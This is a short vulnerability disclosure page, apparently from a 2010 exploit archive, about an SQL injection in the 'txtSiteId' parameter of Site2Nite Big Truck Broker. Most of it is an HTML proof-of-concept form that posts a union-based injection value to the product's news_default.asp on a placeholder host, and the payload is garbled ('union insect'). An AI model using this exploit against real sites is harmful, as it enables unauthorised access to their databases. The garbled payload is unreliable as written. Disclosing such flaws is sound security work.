Site2Nite Big Truck Broker "txtSiteId" SQL Injection Vulnerability

2010-11-28 09:15:18

<!--
Site2Nite Big Truck Broker "txtSiteId" SQL Injection Vulnerability
PRODUCT: Site2Nite Big Truck Broker
PRODUCT URL: http://www.site2nite.com/productdetail.asp?id=14
RESEARCHERS: underground-stockholm.com
RESEARCHERS URL: http://underground-stockholm.com/
-->
<html>
<body>
<form method="post" action="http://[host]/[path]/news_default.asp">
<input type="text" name="txtSiteId" value="-1 union insect">
<input type="hidden" name="cmdSearchId" value="Go">
<input type="submit">
</form>
</body>
</html>

<!-- Dynamic page generated in 0.033 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2010-11-29 08:15:11 -->

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.